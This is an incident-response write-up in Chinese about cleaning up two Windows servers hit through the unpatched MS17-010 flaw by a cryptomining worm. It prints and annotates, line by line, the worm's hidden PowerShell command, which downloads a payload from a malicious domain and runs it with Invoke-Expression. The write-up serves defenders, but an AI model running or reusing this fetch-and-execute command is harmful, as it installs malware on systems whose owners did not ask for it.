PowerShell運行的是什么腳本
案例一
在公司這幾天收到 CSO 發來不少火絨告警訊息,通過查看信息發現是攻擊 445 端口,這一看很可能是永恒之藍呀。
通過對這臺機器端口掃描結果發現對方也開了 445。
135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1688/tcp open nsjtp-data 3389/tcp open ms-wbt-server 5200/tcp open targus-getdata 49152/tcp open unknown 49153/tcp open unknown 49155/tcp open unknown 49197/tcp open unknown 49350/tcp open unknown 49438/tcp open unknown 57084/tcp open unknown 65529/tcp open unknown 65530/tcp open unknown 65533/tcp open unknown
問負責人要了密碼登錄進去,隨手看了下任務管理器,資源占用還挺高,任務欄程序窗口也沒有,超奇怪的唉。
那我想怎么能查得到這個 PowerShell 運行的是什么腳本呀,通過 google 找到一條語句,可查詢 powershell.exe 命令行參數。
wmic process where caption="powershell.exe" get caption,commandline /value
得到異常參數。
Caption=powershell.exe CommandLine=powershell -nop -w hidden -ep bypass -c "$ifp=$env:tmp+'if.bin';if(test-path $ifp){$con=[System.IO.File]::ReadAllBytes($ifp);[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$_.ToString('X2')};if($s-ne'676e657e578e22cb7a9138d6979c46c1'){$con=''}}if(!$con){$con=(New-Object Net.WebClient).downloaddata('http://down.ackng.com/if.bin?ID=WIN-G4SEL2FMI8M&GUID=DC503C42-A0A0-EBD7-0982-249C228D246A&MAC=005632:54&OS=6.3.9600&BIT=64 位&USER=MSSQLSERVER&DOMAIN=WORKGROUP&D=&CD=Microsoft 基本顯示適配器&P=0&FI=0&FM=0&IF=0&MF=0&HR=&UP=1586108.812&_T=1572307138.34506');[System.IO.File]::WriteAllBytes($ifp,$con)}IEX(-join[char[]]$con)"
一搜其中down.ackng.com域名得知是挖礦病毒。
手動格式化并查了一堆資料后寫下注釋。
powershell-nop -w hidden -ep bypass
-c " $ifp=$env:tmp+'if.bin'; # 獲取當前用戶tmp目錄下if.bin文件信息
if(test-path $ifp){ # 用test-path判斷if.bin文件是否存在 $con=[System.IO.File]::ReadAllBytes($ifp); # 將if.bin文件作為字節讀入內存,不過這里是放入變量
[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$_.ToString('X2')}; # 計算已經加載到內存中if.bin文件的md5校驗和,將內容轉換為十六進制存入變量s
if($s-ne'676e657e578e22cb7a9138d6979c46c1'){$con=''} # 看校驗和是否一至,不是就將$con清空(看看是不是自家挖礦文件)。
}
if(!$con){ # 如果$con沒被篡改(或不存在)繼續往下走 $con=(New-Object Net.WebClient).downloaddata('http://down.ackng.com/if.bin?ID=WIN-G4SEL2FMI8M&GUID=DC503C42-A0A0-EBD7-0982-249C228D246A&MAC=005632:54&OS=6.3.9600&BIT=64 位&USER=MSSQLSERVER&DOMAIN=WORKGROUP&D=&CD=Microsoft 基本顯示適配器&P=0&FI=0&FM=0&IF=0&MF=0&HR=&UP=1586108.812&_T=1572307138.34506');
[System.IO.File]::WriteAllBytes($ifp,$con)
# 創建一個對象,使用這個對象下載,將下載的內容存入$con變量,隨后將$con的內容寫入$ifp路徑。
}
IEX(-join[char[]]$con) # IEX=Invoke-Expression,用來執行$con惡意內容,搞不懂為啥要轉換數組再join連接-join[char[]]
"
根據腳本$env:tmp查看目錄中發現if.bin和m6.bin。
從秦蕭公眾號一篇應急響應文章得知判斷方法,要想斷定病毒或木馬文件可以查看詳細信息是否為空,正常文件都會帶有信息。這 tips 在整理這篇總結時才發現,遂記錄于此。
netstat -ano查看網絡連接和Wireshark抓包都沒異常連接,火絨也沒正常啟用(顯示驅動版本不匹配)。
查詢系統補丁,服務器系統是 2012R2, MS17-010的 kb4012213 和 kb4012216 補丁都沒打,永恒之藍實錘了。
systeminfo | findstr /I "kb4012213" systeminfo | findstr /I "kb4012216"
按基操查繼續看任務計劃、安全日志、系統日志、服務這幾個方面。
任務計劃發現命令方式都是隨機字母,執行參數和前面混淆過的代碼差不多。
日志和服務忘記錄了,不過一般會有大量登錄失敗的痕跡,我也見過直接把日志清空的情況....
腳本執行思路
分析 if.bin 文件,得知腳本會掃描整個內網 B 段和 C 段,采用 MS17-010 入侵和 3389 爆破等手段進入機器,采用無文件方式運行(甚至 360 開著都無法檢測出這個進程出現問題),并使用任務計劃等手段在服務器上持久化。
修復策略
刪除異常任務計劃
刪除后門文件
結束PowerShell進程
開啟Windows防火墻,并在入站規則禁止 445。
下載AD并全盤查殺
打補丁
案例二
又收到一條阿里云告警信息。
進程信息
網絡連接
大量連接遠程主機445端口,很有可能是被當作肉雞去攻擊別人機器。
補丁信息
未打 MS17-010 補丁。
systeminfo | find "4012215" systeminfo | find "4012212"
主機名: xx-xx OS 名稱: Microsoft Windows Server 2008 R2 Standard OS 版本: 6.1.7601 Service Pack 1 Build 7601 OS 制造商: Microsoft Corporation OS 配置: 獨立服務器 OS 構件類型: Multiprocessor Free 注冊的所有人: Windows 用戶 注冊的組織: 產品 ID: 00477-001-0000421-84376 初始安裝日期: 2013/6/27, 1743 系統啟動時間: 2019/11/15, 2250 系統制造商: Alibaba Cloud 系統型號: Alibaba Cloud ECS 系統類型: x64-based PC 處理器: 安裝了 1 個處理器。 [01]: Intel64 Family 6 Model 85 Stepping 4 GenuineIntel ~2500 Mhz BIOS 版本: SeaBIOS 3288b3c, 2014/4/1 Windows 目錄: C:windows 系統目錄: C:windowssystem32 啟動設備: DeviceHarddiskVolume1 系統區域設置: zh-cn;中文(中國) 輸入法區域設置: zh-cn;中文(中國) 時區: (UTC+08:00)北京,重慶,香港特別行政區,烏魯木齊 物理內存總量: 8,191 MB 可用的物理內存: 4,079 MB 虛擬內存: 最大值: 16,381 MB 虛擬內存: 可用: 7,580 MB 虛擬內存: 使用中: 8,801 MB 頁面文件位置: D:pagefile.sys 域: WORKGROUP 登錄服務器: \xx-xx 修補程序: 安裝了 185 個修補程序。 [01]: KB981391 [02]: KB981392 [03]: KB977236 [04]: KB981111 [05]: KB977238 [06]: KB2849697 [07]: KB2849696 [08]: KB2841134 [09]: KB2841134 [10]: KB977239 [11]: KB2670838 [12]: KB2592687 [13]: KB981390 [14]: KB2386667 [15]: KB2425227 [16]: KB2506014 [17]: KB2506212 [18]: KB2506928 [19]: KB2509553 [20]: KB2511455 [21]: KB2515325 [22]: KB2529073 [23]: KB2533552 [24]: KB2536275 [25]: KB2536276 [26]: KB2541014 [27]: KB2544893 [28]: KB2545698 [29]: KB2547666 [30]: KB2552343 [31]: KB2560656 [32]: KB2563227 [33]: KB2564958 [34]: KB2570947 [35]: KB2574819 [36]: KB2584146 [37]: KB2585542 [38]: KB2603229 [39]: KB2604115 [40]: KB2607047 [41]: KB2608658 [42]: KB2618451 [43]: KB2620704 [44]: KB2621440 [45]: KB2631813 [46]: KB2636573 [47]: KB2640148 [48]: KB2643719 [49]: KB2644615 [50]: KB2645640 [51]: KB2647753 [52]: KB2653956 [53]: KB2654428 [54]: KB2655992 [55]: KB2656356 [56]: KB2658846 [57]: KB2659262 [58]: KB2660075 [59]: KB2667402 [60]: KB2676562 [61]: KB2685811 [62]: KB2685813 [63]: KB2685939 [64]: KB2690533 [65]: KB2691442 [66]: KB2698365 [67]: KB2699779 [68]: KB2705219 [69]: KB2706045 [70]: KB2709630 [71]: KB2709981 [72]: KB2712808 [73]: KB2718704 [74]: KB2719857 [75]: KB2726535 [76]: KB2729094 [77]: KB2729452 [78]: KB2732059 [79]: KB2742599 [80]: KB2743555 [81]: KB2749655 [82]: KB2750841 [83]: KB2753842 [84]: KB2757638 [85]: KB2758857 [86]: KB2761217 [87]: KB2763523 [88]: KB2765809 [89]: KB2770660 [90]: KB2779562 [91]: KB2785220 [92]: KB2786081 [93]: KB2786400 [94]: KB2789645 [95]: KB2790113 [96]: KB2791765 [97]: KB2798162 [98]: KB2800095 [99]: KB2804579 [100]: KB2807986 [101]: KB2808679 [102]: KB2813170 [103]: KB2813347 [104]: KB2813430 [105]: KB2820197 [106]: KB2820331 [107]: KB2829361 [108]: KB2830290 [109]: KB2834140 [110]: KB2835361 [111]: KB2836502 [112]: KB2836943 [113]: KB2838727 [114]: KB2839894 [115]: KB2840149 [116]: KB2843630 [117]: KB2845690 [118]: KB2847311 [119]: KB2852386 [120]: KB2853952 [121]: KB2862152 [122]: KB2862330 [123]: KB2862335 [124]: KB2862966 [125]: KB2862973 [126]: KB2864058 [127]: KB2864202 [128]: KB2868038 [129]: KB2868116 [130]: KB2868626 [131]: KB2871997 [132]: KB2872339 [133]: KB2882822 [134]: KB2884256 [135]: KB2887069 [136]: KB2888049 [137]: KB2891804 [138]: KB2892074 [139]: KB2893294 [140]: KB2893519 [141]: KB2908783 [142]: KB2912390 [143]: KB2913152 [144]: KB2918614 [145]: KB2919469 [146]: KB2922229 [147]: KB2926765 [148]: KB2928562 [149]: KB2929733 [150]: KB2929755 [151]: KB2939576 [152]: KB2957189 [153]: KB2957503 [154]: KB2957509 [155]: KB2961072 [156]: KB2961851 [157]: KB2966583 [158]: KB2970228 [159]: KB2973201 [160]: KB2973351 [161]: KB2976897 [162]: KB2977292 [163]: KB2977728 [164]: KB2978092 [165]: KB2978120 [166]: KB2978668 [167]: KB2980245 [168]: KB2984972 [169]: KB2984976 [170]: KB2985461 [171]: KB2991963 [172]: KB2992611 [173]: KB2993651 [174]: KB2993958 [175]: KB2998527 [176]: KB2999226 [177]: KB3002885 [178]: KB3003057 [179]: KB3003743 [180]: KB3005607 [181]: KB3006226 [182]: KB3008627 [183]: KB3010788 [184]: KB976902 [185]: KB982018 網卡: 安裝了 3 個 NIC。 [01]: Microsoft Loopback Adapter 連接名: loopback 啟用 DHCP: 是 DHCP 服務器: 255.255.255.255 IP 地址 [01]: 169.254.114.140 [02]: fe80:78b9728c [02]: Microsoft Loopback Adapter 連接名: Npcap Loopback Adapter 啟用 DHCP: 是 DHCP 服務器: 255.255.255.255 IP 地址 [01]: 169.254.219.140 [02]: fe80:a78edb8c [03]: Red Hat VirtIO Ethernet Adapter 連接名: 本地連接 3 啟用 DHCP: 否 IP 地址 [01]: 192.168.2.18 [02]: fe80:ef0f6468
日志信息
根據惡意程序創建時間來篩查,安全日志 11 月 22 日前均被刪除。
通過查詢服務創建時間和釋放時間吻合。
處理
通過火絨掃描刪除惡意程序
防火墻入站規則禁止 445 連接本機。
PS:為什么文件沒有被鎖.....也許阿里云盾攔截操作了吧。
審核編輯:彭靜
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。
舉報投訴
-
服務器
+關注
關注
12文章
9199瀏覽量
85517 -
Shell
+關注
關注
1文章
366瀏覽量
23400 -
腳本
+關注
關注
1文章
390瀏覽量
14880
原文標題:實戰 | 記兩次應急響應過程
文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
相關推薦
使用離線包安裝IDF工具后,cmd窗口能正常運行腳本和編譯,在啟動powershell窗口時卻提示錯誤,為什么?
使用離線包安裝IDF工具后,cmd窗口能正常運行腳本和編譯,但在啟動powershell窗口時卻提示錯誤,如下:
Windows PowerShell
版權所有 (C) 2009 Microsoft
發表于 06-13 08:13
Win10系統PowerShell命令匯總
1、打開PowerShell環境
Windows 10 中已內置了 PowerShell 命令行環境,大家可以直接搜索「PowerShell」并以管理員身份運行。
或者在搜索欄中
發表于 07-24 08:08
Powershell模塊TLS無法正常工作
大家好...我在使用PowerShell與我的Intel AMT設備進行通信時遇到問題。它之前一直工作得很好,但現在我得到一個Schannel錯誤70(協議錯誤)我想這是因為Intel AMT不再
發表于 10-24 15:18
如何使用Microsoft Powershell訪問英特爾AMT功能
Gael Hofemeier演示了如何使用Microsoft * Powershell訪問英特爾?AMT功能。
怎樣用Wamp服務器運行PHP腳本
今天讓我解釋一下如何使用wamp服務器運行PHP文件。您可以使用此方法來運行您可能從某個地方獲得的PHP腳本,并且幾乎不需要或幾乎不了解PHP。您可以通過輸出為Web瀏覽器的Web服務器執行腳
微軟PowerShell 7的5個變化
上個月微軟 PowerShell 7發布了第5個預覽版,離最終正式版本又更進了一步。本文介紹一下PowerShell 7將帶來的5大變化,主要是一些大方向上的特性。
微軟PowerShell 7.0 RC的主要功能,下個月正式版本發行
PowerShell 7.0 發布了候選版本,正式版本預計于下個月發行。先來看看 PowerShell 7 中一些最主要的功能:
全新PowerShell 7.0發布 支持多個平臺
從早期的MS-DOS到后來的Windows CMD再到如今的PowerShell,微軟在終端工具方面不斷精進,現在又發布了全新的PowerShell 7.0,開源跨平臺,可在Windows、Linux、macOS各個平臺上管理異構環境、混合云。
微軟發布PowerShell Crescendo預覽版
微軟近期通過博客發布了 PowerShell Crescendo 預覽版,這是一款本機命令的安裝包,一款面向管理員和開發人員的新工具。 IT之家獲悉,PowerShell Crescendo 通過
如何防止腳本重復運行
已知任何系統在相同的路徑下,不可能出現兩個相同的文件名,因此思路就是在腳本運行的開始, 獲取自身的腳本文件名稱和腳本所在路徑,然后獲取所有正在運行
如何在Linux命令行中運行Python腳本
Python 腳本。
在本文中,我們將詳細介紹如何在 Linux 命令行中運行 Python 腳本。我們將討論以下主題:
ie瀏覽器限制運行腳本
IE瀏覽器限制運行腳本是指在Internet Explorer瀏覽器中,存在一些限制和安全策略,以保護用戶的電腦免受惡意腳本的攻擊。這些限制有助于防止在瀏覽器中執行惡意代碼,保護用戶的隱私和電腦
腳本錯誤scripterror怎么解決
“腳本錯誤”(Script Error)通常是在運行或嘗試運行一段腳本或程序時出現的錯誤。這種錯誤可能源于許多不同的原因,包括語法錯誤、運行
js腳本怎么在瀏覽器中運行
在瀏覽器中運行JavaScript腳本是一種常見的方式,因為JavaScript是一種在Web瀏覽器中執行的腳本語言。下面是一個詳細的,最少1500字的文章,介紹如何在瀏覽器中運行
工商網監
評論